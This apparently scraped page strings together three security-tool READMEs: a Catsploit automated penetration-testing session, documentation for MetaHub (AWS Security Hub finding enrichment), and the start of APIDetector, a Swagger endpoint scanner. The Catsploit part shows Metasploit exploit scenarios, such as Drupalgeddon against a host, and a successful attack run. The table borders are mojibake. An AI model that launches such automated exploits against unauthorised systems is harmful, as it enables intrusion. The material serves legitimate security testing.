β‘ββββββββββββββββββββββββββββββββββββγ 3;ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ©
β 3d3ivc β 0.0.0.0 β 192.168.0.10 β 1.0 β 32.0 β 1 β exploit/multi/http/jenkins_sβ¦ β
β 5gnsvh β 0.0.0.0 β 192.168.0.10 β 1.0 β 53.76 β 2 β exploit/multi/http/jenkins_sβ¦ β
β 6nlxyc β 0.0.0.0 β 192.168.0.10 β 0.0 β 48.32 β 2 β exploit/multi/http/jenkins_sβ¦ β
β 8jos4z β 0.0.0.0 β 192.168.0.1 0 β 0.7 β 72.8 β 2 β exploit/multi/http/jenkins_sβ¦ β
β 8kmmts β 0.0.0.0 β 192.168.0.10 β 0.0 β 32.0 β 1 β exploit/multi/elasticsearch/β¦ β
β agjmma β 0.0.0.0 β 192.168.0.10 β 0.0 β 24.0 β 1 β exploit/windows/http/manageeβ¦ β
β joglhf β 0.0.0.0 β 192.168.0.10 β 70.0 β 60.0 β 1 β auxiliary/scanner/ssh/ssh_loβ¦ β
β rmgrof β 0.0.0.0 β 192.168.0.10 β 100.0 β 32.0 β 1 β exploit/multi/http/drupal_drβ¦ β
β xuowzk β 0.0.0.0 β 192.168.0.10 β 0.0 β 24.0 β 1 β exploit/multi/http/struts_dmβ¦ β
β yttv51 β 0.0.0.0 β 192.168.0.10 β 0.01 β 53.76 β 2 β exploit/multi/http/jenkins_sβ¦ β
β znv76x β 0.0.0.0 β 192.168.0.10 β 0.01 β 53.76 β 2 β exploit/multi/http/jenkins_sβ¦ β
βββββββββββββββ΄ββββββββββββββ΄βββββββββββββββββ΄ββββββββ΄ββββββββ΄ββββββββ΄ββββββββββββββββββββββββββββββββ
catsploit> scenario detail rmgrof
βββββββββββββββ³βββββββββββββββββ³ββββββββ³βββββββ
β src host ip β target host ip β eVc β eVd β
β‘ββββββββββββββββββββββββββββββββββββββββββββββ©
β 0.0.0.0 β 192.168.0.10 β 100.0 β 32.0 β
βββββββββββββββ΄ββββββββ ββββββββ΄ββββββββ΄βββββββ
[Steps]
βββββ³ββββββββββββββββββββββββββββββββββββββββ³ββββββββββββββββββββββββ
β # β step β params β
β‘βββββββββββββββββββββββββββββββ ββββββββββββββββββββββββββββββββββββ©
β 1 β exploit/multi/http/drupal_drupageddon β RHOSTS: 192.168.0.10 β
β β β LHOST: 192.168.10.100 β
βββββ΄ββββββββββββββββββββββββββββββββββββββββ΄ββββββββββββββββββββββββ
catsploit> attack rmgrof
> ~> ~
> Metasploit Console Log
> ~
> ~
[+] Attack scenario succeeded!
catsploit> exit
Bye.
All informations and codes are provided solely for educational purposes and/or testing your own systems.
For any inquiry, please contact the email address as follows:
catsploit@nk.MitsubishiElectric.co.jp
MetaHub is an automated contextual security findings enrichment and impact evaluation tool for vulnerability management. You can use it with AWS Security Hub or any ASFF-compatible security scanner. Stop relying on useless severities and switch to impact scoring definitions based on YOUR context.
MetaHub is an open-source security tool for impact-contextual vulnerability management. It can automate the process of contextualizing security findings based on your environment and your needs: YOUR context, identifying ownership, and calculate an impact scoring based on it that you can use for defining prioritization and automation. You can use it with AWS Security Hub or any ASFF security scanners (like Prowler).
MetaHub describe your context by connecting to your affected resources in your affected accounts. It can describe information about your AWS account and organization, the affected resources tags, the affected CloudTrail events, your affected resource configurations, and all their associations: if you are contextualizing a security finding affecting an EC2 Instance, MetaHub will not only connect to that instance itself but also its IAM Roles; from there, it will connect to the IAM Policies associated with those roles. It will connect to the Security Groups and analyze all their rules, the VPC and the Subnets where the instance is running, the Volumes, the Auto Scaling Groups, and more.
After fetching all the information from your context, MetaHub will evaluate certain important conditions for all your resources: exposure
, access
, encryption
, status
, environment
and application
. Based on those calculations and in addition to the information from the security findings affecting the resource all together, MetaHub will generate a Scoring for each finding.
Check the following dashboard generated by MetaHub. You have the affected resources, grouping all the security findings affecting them together and the original severity of the finding. After that, you have the Impact Score and all the criteria MetaHub evaluated to generate that score. All this information is filterable, sortable, groupable, downloadable, and customizable.
You can rely on this Impact Score for prioritizing findings (where should you start?), directing attention to critical issues, and automating alerts and escalations.
MetaHub can also filter, deduplicate, group, report, suppress, or update your security findings in automated workflows. It is designed for use as a CLI tool or within automated workflows, such as AWS Security Hub custom actions or AWS Lambda functions.
The following is the JSON output for a an EC2 instance; see how MetaHub organizes all the information about its context together, under associations
, config
, tags
, account
cloudtrail
, and impact
In MetaHub, context refers to information about the affected resources like their configuration, associations, logs, tags, account, and more.
MetaHub doesn't stop at the affected resource but analyzes any associated or attached resources. For instance, if there is a security finding on an EC2 instance, MetaHub will not only analyze the instance but also the security groups attached to it, including their rules. MetaHub will examine the IAM roles that the affected resource is using and the policies attached to those roles for any issues. It will analyze the EBS attached to the instance and determine if they are encrypted. It will also analyze the Auto Scaling Groups that the instance is associated with and how. MetaHub will also analyze the VPC, Subnets, and other resources associated with the instance.
The Context module has the capability to retrieve information from the affected resources, affected accounts, and every associated resources. The context module has five main parts: config
(which includes associations
as well), tags
, cloudtrail
, and account
. By default config
and tags
are enabled, but you can change this behavior using the option --context
(for enabling all the context modules you can use --context config tags cloudtrail account
). The output of each enabled key will be added under the affected resource.
Under the config
key, you can find anyting related to the configuration of the affected resource. For example, if the affected resource is an EC2 Instance, you will see keys like private_ip
, public_ip
, or instance_profile
.
You can filter your findings based on Config outputs using the option: --mh-filters-config <key> {True/False}
. See Config Filtering.
Under the associations
key, you will find all the associated resources of the affected resource. For example, if the affected resource is an EC2 Instance, you will find resources like: Security Groups, IAM Roles, Volumes, VPC, Subnets, Auto Scaling Groups, etc. Each time MetaHub finds an association, it will connect to the associated resource again and fetch its own context.
Associations are key to understanding the context and impact of your security findings as their exposure.
You can filter your findings based on Associations outputs using the option: --mh-filters-config <key> {True/False}
. See Config Filtering.
MetaHub relies on AWS Resource Groups Tagging API to query the tags associated with your resources.
Note that not all AWS resource type supports this API. You can check supported services.
Tags are a crucial part of understanding your context. Tagging strategies often include:
If you follow a proper tagging strategy, you can filter and generate interesting outputs. For example, you could list all findings related to a specific team and provide that data directly to that team.
You can filter your findings based on Tags outputs using the option: --mh-filters-tags TAG=VALUE
. See Tags Filtering
Under the key cloudtrail
, you will find critical Cloudtrail events related to the affected resource, such as creating events.
The Cloudtrail events that we look for are defined by resource type, and you can add, remove or change them by editing the configuration file resources.py.
For example for an affected resource of type Security Group, MetaHub will look for the following events:
CreateSecurityGroup
: Security Group Creation eventAuthorizeSecurityGroupIngress
: Security Group Rule Authorization event.Under the key account
, you will find information about the account where the affected resource is runnning, like if it's part of an AWS Organizations, information about their contacts, etc.
MetaHub also focuses on ownership detection. It can determine the owner of the affected resource in various ways. This information can be used to automatically assign a security finding to the correct owner, escalate it, or make decisions based on this information.
An automated way to determine the owner of a resource is critical for security teams. It allows them to focus on the most critical issues and escalate them to the right people in automated workflows. But automating workflows this way, it is only viable if you have a reliable way to define the impact of a finding, which is why MetaHub also focuses on impact.
The impact module in MetaHub focuses on generating a score for each finding based on the context of the affected resource and all the security findings affecting them. For the context, we define a series of evaluated criteria; you can add, remove, or modify these criteria based on your needs. The Impact criteria are combined with a metric generated based on all the Security Findings affecting the affected resource and their severities.
The following are the impact criteria that MetaHub evaluates by default:
Exposure evaluates the how the the affected resource is exposed to other networks. For example, if the affected resource is public, if it is part of a VPC, if it has a public IP or if it is protected by a firewall or a security group.
Possible Statuses | Value | Description |
---|---|---|
ο΄ effectively-public | 100% | The resource is effectively public from the Internet. |
ο restricted-public | 40% | The resource is public, but there is a restriction like a Security Group. |
ο unrestricted-private | 30% | The resource is private but unrestricted, like an open security group. |
ο launch-public | 10% | These are resources that can launch other resources as public. For example, an Auto Scaling group or a Subnet. |
ο’ restricted | 0% | The resource is restricted. |
ο΅ unknown | - | The resource couldn't be checked |
Access evaluates the resource policy layer. MetaHub checks every available policy including: IAM Managed policies, IAM Inline policies, Resource Policies, Bucket ACLS, and any association to other resources like IAM Roles which its policies are also analyzed . An unrestricted policy is not only an itsue itself of that policy, it afected any other resource which is using it.
Possible Statuses | Value | Description |
---|---|---|
ο΄ unrestricted | 100% | The principal is unrestricted, without any condition or restriction. |
ο΄ untrusted-principal | 70% | The principal is an AWS Account, not part of your trusted accounts. |
ο unrestricted-principal | 40% | The principal is not restricted, defined with a wildcard. It could be conditions restricting it or other restrictions like s3 public blocks. |
ο cross-account-principal | 30% | The principal is from another AWS account. |
ο unrestricted-actions | 30% | The actions are defined using wildcards. |
ο dangerous-actions | 30% | Some dangerous actions are defined as part of this policy. |
ο unrestricted-service | 10% | The policy allows an AWS service as principal without restriction. |
ο’ restricted | 0% | The policy is restricted. |
ο΅ unknown | - | The policy couldn't be checked. |
Encryption evaluate the different encryption layers based on each resource type. For example, for some resources it evaluates if at_rest
and in_transit
encryption configuration are both enabled.
Possible Statuses | Value | Description |
---|---|---|
ο΄ unencrypted | 100% | The resource is not fully encrypted. |
ο’ encrypted | 0% | The resource is fully encrypted including any of it's associations. |
ο΅ unknown | - | The resource encryption couldn't be checked. |
Status evaluate the status of the affected resource in terms of attachment or functioning. For example, for an EC2 Instance we evaluate if the resource is running, stopped, or terminated, but for resources like EBS Volumes and Security Groups, we evaluate if those resources are attached to any other resource.
Possible Statuses | Value | Description |
---|---|---|
ο attached | 100% | The resource supports attachment and is attached. |
ο running | 100% | The resource supports running and is running. |
ο enabled | 100% | The resource supports enabled and is enabled. |
ο’ not-attached | 0% | The resource supports attachment, and it is not attached. |
ο’ not-running | 0% | The resource supports running and it is not running. |
ο’ not-enabled | 0% | The resource supports enabled and it is not enabled. |
ο΅ unknown | - | The resource couldn't be checked for status. |
Environment evaluates the environment where the affected resource is running. By default, MetaHub defines 3 environments: production
, staging
, and development
, but you can add, remove, or modify these environments based on your needs. MetaHub evaluates the environment based on the tags of the affected resource, the account id or the account alias. You can define your own environemnts definitions and strategy in the configuration file (See Customizing Configuration).
Possible Statuses | Value | Description |
---|---|---|
ο production | 100% | It is a production resource. |
ο’ staging | 30% | It is a staging resource. |
ο’ development | 0% | It is a development resource. |
ο΅ unknown | - | The resource couldn't be checked for enviroment. |
Application evaluates the application that the affected resource is part of. MetaHub relies on the AWS myApplications feature, which relies on the Tag awsApplication
, but you can extend this functionality based on your context for example by defining other tags you use for defining applications or services (like Service
or any other), or by relying on account id or alias. You can define your application definitions and strategy in the configuration file (See Customizing Configuration).
Possible Statuses | Value | Description |
---|---|---|
ο΅ unknown | - | The resource couldn't be checked for application. |
As part of the impact score calculation, we also evaluate the total ammount of security findings and their severities affecting the resource. We use the following formula to calculate this metric:
(SUM of all (Finding Severity / Highest Severity) with a maximum of 1)
For example, if the affected resource has two findings affecting it, one with HIGH
and another with LOW
severity, the Impact Findings Score will be:
SUM(HIGH (3) / CRITICAL (4) + LOW (0.5) / CRITICAL (4)) = 0.875
MetaHub reads your security findings from AWS Security Hub or any ASFF-compatible security scanner. It then queries the affected resources directly in the affected account to provide additional context. Based on that context, it calculates it's impact. Finally, it generates different outputs based on your needs.
Some use cases for MetaHub include:
MetaHub provides a range of ways to list and manage security findings for investigation, suppression, updating, and integration with other tools or alerting systems. To avoid Shadowing and Duplication, MetaHub organizes related findings together when they pertain to the same resource. For more information, refer to Findings Aggregation
MetaHub queries the affected resources directly in the affected account to provide additional context using the following options:
MetaHub supports filters on top of these context* outputs to automate the detection of other resources with the same issues. You can filter security findings affecting resources tagged in a certain way (e.g., Environment=production
) and combine this with filters based on Config or Associations, like, for example, if the resource is public, if it is encrypted, only if they are part of a VPC, if they are using a specific IAM role, and more. For more information, refer to Config filters and Tags filters for more information.
But that's not all. If you are using MetaHub with Security Hub, you can even combine the previous filters with the Security Hub native filters (AWS Security Hub filtering). You can filter the same way you would with the AWS CLI utility using the option --sh-filters
, but in addition, you can save and re-use your filters as YAML files using the option --sh-template
.
If you prefer, With MetaHub, you can back enrich your findings directly in AWS Security Hub using the option --enrich-findings
. This action will update your AWS Security Hub findings using the field UserDefinedFields
. You can then create filters or Insights directly in AWS Security Hub and take advantage of the contextualization added by MetaHub.
When investigating findings, you may need to update security findings altogether. MetaHub also allows you to execute bulk updates to AWS Security Hub findings, such as changing Workflow Status using the option --update-findings
. As an example, you identified that you have hundreds of security findings about public resources. Still, based on the MetaHub context, you know those resources are not effectively public as they are protected by routing and firewalls. You can update all the findings for the output of your MetaHub query with one command. When updating findings using MetaHub, you also update the field Note
of your finding with a custom text for future reference.
MetaHub supports different Output Modes, some of them json based like json-inventory, json-statistics, json-short, json-full, but also powerfull html, xlsx and csv. These outputs are customizable; you can choose which columns to show. For example, you may need a report about your affected resources, adding the tag Owner, Service, and Environment and nothing else. Check the configuration file and define the columns you need.
MetaHub supports multi-account setups. You can run the tool from any environment by assuming roles in your AWS Security Hub master
account and your child/service
accounts where your resources live. This allows you to fetch aggregated data from multiple accounts using your AWS Security Hub multi-account implementation while also fetching and enriching those findings with data from the accounts where your affected resources live based on your needs. Refer to Configuring Security Hub for more information.
MetaHub uses configuration files that let you customize some checks behaviors, default filters, and more. The configuration files are located in lib/config/.
Things you can customize:
lib/config/configuration.py: This file contains the default configuration for MetaHub. You can change the default filters, the default output modes, the environment definitions, and more.
lib/config/impact.py: This file contains the values and it's weights for the impact formula criteria. You can modify the values and the weights based on your needs.
lib/config/reources.py: This file contains definitions for every resource type, like which CloudTrail events to look for.
MetaHub is a Python3 program. You need to have Python3 installed in your system and the required Python modules described in the file requirements.txt
.
Requirements can be installed in your system manually (using pip3) or using a Python virtual environment (suggested method).
git clone git@github.com:gabrielsoltz/metahub.git
cd metahub
python3 -m venv venv/metahub
source venv/metahub/bin/activate
pip3 install -r requirements.txt
./metahub -h
deactivate
Next time, you only need steps 4 and 6 to use the program.
Alternatively, you can run this tool using Docker.
MetaHub is also available as a Docker image. You can run it directly from the public Docker image or build it locally.
The available tagging for MetaHub containers are the following:
latest
: in sync with master branch<x.y.z>
: you can find the releases here
stable
: this tag always points to the latest release.For running from the public registry, you can run the following command:
docker run -ti public.ecr.aws/n2p8q5p4/metahub:latest ./metahub -h
If you are already logged into the AWS host machine, you can seamlessly use the same credentials within a Docker container. You can achieve this by either passing the necessary environment variables to the container or by mounting the credentials file.
For instance, you can run the following command:
docker run -e AWS_DEFAULT_REGION -e AWS_ACCESS_KEY_ID -e AWS_SECRET_ACCESS_KEY -e AWS_SESSION_TOKEN -ti public.ecr.aws/n2p8q5p4/metahub:latest ./metahub -h
On the other hand, if you are not logged in on the host machine, you will need to log in again from within the container itself.
Or you can also build it locally:
git clone git@github.com:gabrielsoltz/metahub.git
cd metahub
docker build -t metahub .
docker run -ti metahub ./metahub -h
MetaHub is Lambda/Serverless ready! You can run MetaHub directly on an AWS Lambda function without any additional infrastructure required.
Running MetaHub in a Lambda function allows you to automate its execution based on your defined triggers.
Terraform code is provided for deploying the Lambda function and all its dependencies.
The terraform code for deploying the Lambda function is provided under the terraform/
folder.
Just run the following commands:
cd terraform
terraform init
terraform apply
The code will create a zip file for the lambda code and a zip file for the Python dependencies. It will also create a Lambda function and all the required resources.
You can customize MetaHub options for your lambda by editing the file lib/lambda.py. You can change the default options for MetaHub, such as the filters, the Meta* options, and more.
Terraform will create the minimum required permissions for the Lambda function to run locally (in the same account). If you want your Lambda to assume a role in other accounts (for example, you will need this if you are executing the Lambda in the Security Hub master account that is aggregating findings from other accounts), you will need to specify the role to assume, adding the option --mh-assume-role
in the Lambda function configuration (See previous step) and adding the corresponding policy to allow the Lambda to assume that role in the lambda role.
MetaHub can be run as a Security Hub Custom Action. This allows you to run MetaHub directly from the Security Hub console for a selected finding or for a selected set of findings.
The custom action will then trigger a Lambda function that will run MetaHub for the selected findings. By default, the Lambda function will run MetaHub with the option --enrich-findings
, which means that it will update your finding back with MetaHub outputs. If you want to change this, see Customize Lambda behavior
You need first to create the Lambda function and then create the custom action in Security Hub.
For creating the lambda function, follow the instructions in the Run with Lambda section.
For creating the AWS Security Hub custom action:
For example, you can use aws configure
option.
aws configure
Or you can export your credentials to the environment.
export AWS_DEFAULT_REGION="us-east-1"
export AWS_ACCESS_KEY_ID= "ASXXXXXXX"
export AWS_SECRET_ACCESS_KEY= "XXXXXXXXX"
export AWS_SESSION_TOKEN= "XXXXXXXXX"
If you are running MetaHub for a single AWS account setup (AWS Security Hub is not aggregating findings from different accounts), you don't need to use any additional options; MetaHub will use the credentials in your environment. Still, if your IAM design requires it, it is possible to log in and assume a role in the same account you are logged in. Just use the options --sh-assume-role
to specify the role and --sh-account
with the same AWS Account ID where you are logged in.
--sh-region
: The AWS Region where Security Hub is running. If you don't specify a region, it will use the one configured in your environment. If you are using AWS Security Hub Cross-Region aggregation, you should use that region as the --sh-region option so that you can fetch all findings together.
--sh-account
and --sh-assume-role
: The AWS Account ID where Security Hub is running and the AWS IAM role to assume in that account. These options are helpful when you are logged in to a different AWS Account than the one where AWS Security Hub is running or when running AWS Security Hub in a multiple AWS Account setup. Both options must be used together. The role provided needs to have enough policies to get and update findings in AWS Security Hub (if needed). If you don't specify a --sh-account
, MetaHub will assume the one you are logged in.
--sh-profile
: You can also provide your AWS profile name to use for AWS Security Hub. When using this option, you don't need to specify --sh-account
or --sh-assume-role
as MetaHub will use the credentials from the profile. If you are using --sh-account
and --sh-assume-role
, those options take precedence over --sh-profile
.
This is the minimum IAM policy you need to read and write from AWS Security Hub. If you don't want to update your findings with MetaHub, you can remove the securityhub:BatchUpdateFindings
action.
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"security hub:GetFindings",
"security hub:ListFindingAggregators",
"security hub:BatchUpdateFindings",
"iam:ListAccountAliases"
],
"Resource": [
"*"
]
}
]
}
If you are running MetaHub for a multiple AWS Account setup (AWS Security Hub is aggregating findings from multiple AWS Accounts), you must provide the role to assume for Context queries because the affected resources are not in the same AWS Account that the AWS Security Hub findings. The --mh-assume-role
will be used to connect with the affected resources directly in the affected account. This role needs to have enough policies for being able to describe resources.
The minimum policy needed for context includes the managed policy arn:aws:iam::aws:policy/SecurityAudit
and the following actions:
tag:GetResources
lambda:GetFunction
lambda:GetFunctionUrlConfig
cloudtrail:LookupEvents
account:GetAlternateContact
organizations:DescribeAccount
iam:ListAccountAliases
MetaHub can read security findings directly from AWS Security Hub using its API. If you don't use Security Hub, you can use any ASFF-based scanner. Most cloud security scanners support the ASFF format. Check with them or leave an issue if you need help.
If you want to read from an input ASFF file, you need to use the options:
./metahub.py --inputs file-asff --input-asff path/to/the/file.json.asff path/to/the/file2.json.asff
You also can combine AWS Security Hub findings with input ASFF files specifying both inputs:
./metahub.py --inputs file-asff securityhub --input-asff path/to/the/file.json.asff
When using a file as input, you can't use the option --sh-filters
for filter findings, as this option relies on AWS API for filtering. You can't use the options --update-findings
or --enrich-findings
as those findings are not in the AWS Security Hub. If you are reading from both sources at the same time, only the findings from AWS Security Hub will be updated.
MetaHub can generate different programmatic and visual outputs. By default, all output modes are enabled: json-short
, json-full
, json-statistics
, json-inventory
, html
, csv
, and xlsx
.
The outputs will be saved in the outputs/
folder with the execution date.
If you want only to generate a specific output mode, you can use the option --output-modes
with the desired output mode.
For example, if you only want to generate the output json-short
, you can use:
./metahub.py --output-modes json-short
If you want to generate json-short
, json-full
and html
outputs, you can use:
./metahub.py --output-modes json-short json-full html
Show all findings titles together under each affected resource and the AwsAccountId
, Region
, and ResourceType
:
Show all findings with all data. Findings are organized by ResourceId (ARN). For each finding, you will also get: SeverityLabel,
Workflow,
RecordState,
Compliance,
Id
, and ProductArn
:
Show a list of all resources with their ARN.
Show statistics for each field/value. In the output, you will see each field/value and the number of occurrences; for example, the following output shows statistics for six findings.
You can create rich HTML reports of your findings, adding your context as part of them.
HTML Reports are interactive in many ways:
You can create CSV reports of your findings, adding your context as part of them.
Β
Similar to CSV but with more formatting options.
You can customize which Context keys to unroll as columns for your HTML, CSV, and XLSX outputs using the options --output-tag-columns
and --output-config-columns
(as a list of columns). If the keys you specified don't exist for the affected resource, they will be empty. You can also configure these columns by default in the configuration file (See Customizing Configuration).
For example, you can generate an HTML output with Tags and add "Owner" and "Environment" as columns to your report using the:
./metahub --output-modes html --output-tag-columns Owner Environment
You can filter the security findings and resources that you get from your source in different ways and combine all of them to get exactly what you are looking for, then re-use those filters to create alerts.
MetaHub supports filtering AWS Security Hub findings in the form of KEY=VALUE
filtering for AWS Security Hub using the option --sh-filters
, the same way you would filter using AWS CLI but limited to the EQUALS
comparison. If you want another comparison, use the option --sh-template
Security Hub Filtering using YAML templates.
You can check available filters in AWS Documentation
./metahub --sh-filters <KEY=VALUE>
If you don't specify any filters, default filters are applied: RecordState=ACTIVE WorkflowStatus=NEW
Passing filters using this option resets the default filters. If you want to add filters to the defaults, you need to specify them in addition to the default ones. For example, adding SeverityLabel to the default filters:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW
If a value contains spaces, you should specify it using double quotes: "ProductName="Security Hub"
You can add how many different filters you need to your query and also add the same filter key with different values:
Examples:
./metaHub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW SeverityLabel=CRITICAL
./metaHub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW SeverityLabel=CRITICAL SeverityLabel=HIGH
./metaHub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW SeverityLabel=CRITICAL AwsAccountId=1234567890
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW Title="EC2.22 Unused EC2 security groups should be removed"
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceType=AwsEc2SecurityGroup
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceId="arn:aws:ec2:eu-west-1:01234567890:security-group/sg-01234567890"
./metahub --sh-filters Id="arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.19/finding/01234567890-1234-1234-1234-01234567890"
./metahub --sh-filters ComplianceStatus=FAILED
MetaHub lets you create complex filters using YAML files (templates) that you can re-use when needed. YAML templates let you write filters using any comparison supported by AWS Security Hub like "EQUALS' | 'PREFIX' | 'NOT_EQUALS' | 'PREFIX_NOT_EQUALS". You can call your YAML file using the option --sh-template <<FILE>>
.
You can find examples under the folder templates
./metaHub --sh-template templates/default.yml
MetaHub supports Config filters (and associations) using KEY=VALUE
where the value can only be True
or False
using the option --mh-filters-config
. You can use as many filters as you want and separate them using spaces. If you specify more than one filter, you will get all resources that match all filters.
Config filters only support True
or False
values:
True
or with data.False
or without data.Config filters run after AWS Security Hub filters:
--sh-filters
(or the default ones).--mh-filters-config
, so it's a subset of the resources from point 1.Examples:
ResourceType=AwsEc2SecurityGroup
) with AWS Security Hub findings that are ACTIVE and NEW (RecordState=ACTIVE WorkflowStatus=NEW
) only if they are associated to Network Interfaces (network_interfaces=True
):./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceType=AwsEc2SecurityGroup --mh-filters-config network_interfaces=True
ResourceType=AwsS3Bucket
) only if they are public (public=True
):./metahub --sh-filters ResourceType=AwsS3Bucket --mh-filters-config public=False
MetaHub supports Tags filters in the form of KEY=VALUE
where KEY is the Tag name and value is the Tag Value. You can use as many filters as you want and separate them using spaces. Specifying multiple filters will give you all resources that match at least one filter.
Tags filters run after AWS Security Hub filters:
--sh-filters
(or the default ones).--mh-filters-tags
, so it's a subset of the resources from point 1.Examples:
ResourceType=AwsEc2SecurityGroup
) with AWS Security Hub findings that are ACTIVE and NEW (RecordState=ACTIVE WorkflowStatus=NEW
) only if they are tagged with a tag Environment
and value Production
:./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceType=AwsEc2SecurityGroup --mh-filters-tags Environment=Production
You can use MetaHub to update your AWS Security Hub Findings workflow status (NOTIFIED,
NEW,
RESOLVED,
SUPPRESSED
) with a single command. You will use the --update-findings
option to update all the findings from your MetaHub query. This means you can update one, ten, or thousands of findings using only one command. AWS Security Hub API is limited to 100 findings per update. Metahub will split your results into 100 items chucks to avoid this limitation and update your findings beside the amount.
For example, using the following filter: ./metahub --sh-filters ResourceType=AwsSageMakerNotebookInstance RecordState=ACTIVE WorkflowStatus=NEW
I found two affected resources with three finding each making six Security Hub findings in total.
Running the following update command will update those six findings' workflow status to NOTIFIED
with a Note:
./metahub --update-findings Workflow=NOTIFIED Note="Enter your ticket ID or reason here as a note that you will add to the finding as part of this update."
The --update-findings
will ask you for confirmation before updating your findings. You can skip this confirmation by using the option --no-actions-confirmation
.
You can use MetaHub to enrich back your AWS Security Hub Findings with Context outputs using the option --enrich-findings
. Enriching your findings means updating them directly in AWS Security Hub. MetaHub uses the UserDefinedFields
field for this.
By enriching your findings directly in AWS Security Hub, you can take advantage of features like Insights and Filters by using the extra information not available in Security Hub before.
For example, you want to enrich all AWS Security Hub findings with WorkflowStatus=NEW
, RecordState=ACTIVE
, and ResourceType=AwsS3Bucket
that are public=True
with Context outputs:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceType=AwsS3Bucket --mh-filters-checks public=True --enrich-findings
The --enrich-findings
will ask you for confirmation before enriching your findings. You can skip this confirmation by using the option --no-actions-confirmation
.
Working with Security Findings sometimes introduces the problem of Shadowing and Duplication.
Shadowing is when two checks refer to the same issue, but one in a more generic way than the other one.
Duplication is when you use more than one scanner and get the same problem from more than one.
Think of a Security Group with port 3389/TCP open to 0.0.0.0/0. Let's use Security Hub findings as an example.
If you are using one of the default Security Standards like AWS-Foundational-Security-Best-Practices,
you will get two findings for the same issue:
EC2.18 Security groups should only allow unrestricted incoming traffic for authorized ports
EC2.19 Security groups should not allow unrestricted access to ports with high risk
If you are also using the standard CIS AWS Foundations Benchmark, you will also get an extra finding:
4.2 Ensure no security groups allow ingress from 0.0.0.0/0 to port 3389
Now, imagine that SG is not in use. In that case, Security Hub will show an additional fourth finding for your resource!
EC2.22 Unused EC2 security groups should be removed
So now you have in your dashboard four findings for one resource!
Suppose you are working with multi-account setups and many resources. In that case, this could result in many findings that refer to the same thing without adding any extra value to your analysis.
MetaHub aggregates security findings under the affected resource.
This is how MetaHub shows the previous example with output-mode json-short:
"arn:aws:ec2:eu-west-1:01234567890:security-group/sg-01234567890": {
"findings": [
"EC2.19 Security groups should not allow unrestricted access to ports with high risk",
"EC2.18 Security groups should only allow unrestricted incoming traffic for authorized ports",
"4.2 Ensure no security groups allow ingress from 0.0.0.0/0 to port 3389",
"EC2.22 Unused EC2 security groups should be removed"
],
"AwsAccountId": "01234567890",
"Region": "eu-west-1",
"ResourceType": "AwsEc2SecurityGroup"
}
This is how MetaHub shows the previous example with output-mode json-full:
"arn:aws:ec2:eu-west-1:01234567890:security-group/sg-01234567890": {
"findings": [
{
"EC2.19 Security groups should not allow unrestricted access to ports with high risk": {
"SeverityLabel": "CRITICAL",
"Workflow": {
"Status": "NEW"
},
"RecordState": "ACTIVE",
"Compliance": {
"Status": "FAILED"
},
"Id": "arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.22/finding/01234567890-1234-1234-1234-01234567890",
"ProductArn": "arn:aws:security hub:eu-west-1::product/aws/security hub"
}
},
{
"EC2.18 Security groups should only allow unrestricted incoming traffic for authorized ports": {
"SeverityLabel": "HIGH",
"Workflow": {
"Status": "NEW"
},
"RecordState": "ACTIVE",< br/> "Compliance": {
"Status": "FAILED"
},
"Id": "arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.22/finding/01234567890-1234-1234-1234-01234567890",
"ProductArn": "arn:aws:security hub:eu-west-1::product/aws/security hub"
}
},
{
"4.2 Ensure no security groups allow ingress from 0.0.0.0/0 to port 3389": {
"SeverityLabel": "HIGH",
"Workflow": {
"Status": "NEW"
},
"RecordState": "ACTIVE",
"Compliance": {
"Status": "FAILED"
},
"Id": "arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.22/finding/01234567890-1234-1234-1234-01234567890",
"ProductArn": "arn:aws:security hub:eu-west-1::product/aws/security hub"
}
},
{
"EC2.22 Unused EC2 security groups should be removed": {
"SeverityLabel": "MEDIUM",
"Workflow": {
"Status": "NEW"
},
"RecordState": "ACTIVE",
"Compliance": {
"Status": "FAILED"
},
"Id": "arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.22/finding/01234567890-1234-1234-1234-01234567890",
"ProductArn": "arn:aws:security hub:eu-west-1::product/aws/security hub"
}
}
],
"AwsAccountId": "01234567890",
"AwsAccountAlias": "obfuscated",
"Region": "eu-west-1",
"ResourceType": "AwsEc2SecurityGroup"
}
Your findings are combined under the ARN of the resource affected, ending in only one result or one non-compliant resource.
You can now work in MetaHub with all these four findings together as if they were only one. For example, you can update these four Workflow Status findings using only one command: See Updating Workflow Status
You can follow this guide if you want to contribute to the Context module guide.
APIDetector is a powerful and efficient tool designed for testing exposed Swagger endpoints in various subdomains with unique smart capabilities to detect false-positives. It's particularly useful for security professionals and developers who are engaged in API testing and vulnerability scanning.
Before running APIDetector, ensure you have Python 3.x and pip installed on your system. You can download Python here.
Clone the APIDetector repository to your local machine using:
git clone https://github.com/brinhosa/apidetector.git
cd apidetector
pip install requests
Run APIDetector using the command line. Here are some usage examples:
Common usage, scan with 30 threads a list of subdomains using a Chrome user-agent and save the results in a file:
python apidetector.py -i list_of_company_subdomains.txt -o results_file.txt -t 30 -ua "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"
To scan a single domain:
python apidetector.py -d example.com
To scan multiple domains from a file:
python apidetector.py -i input_file.txt
To specify an output file:
python apidetector.py -i input_file.txt -o output_file.txt
To use a specific number of threads:
python apidetector.py -i input_file.txt -t 20
To scan with both HTTP and HTTPS protocols:
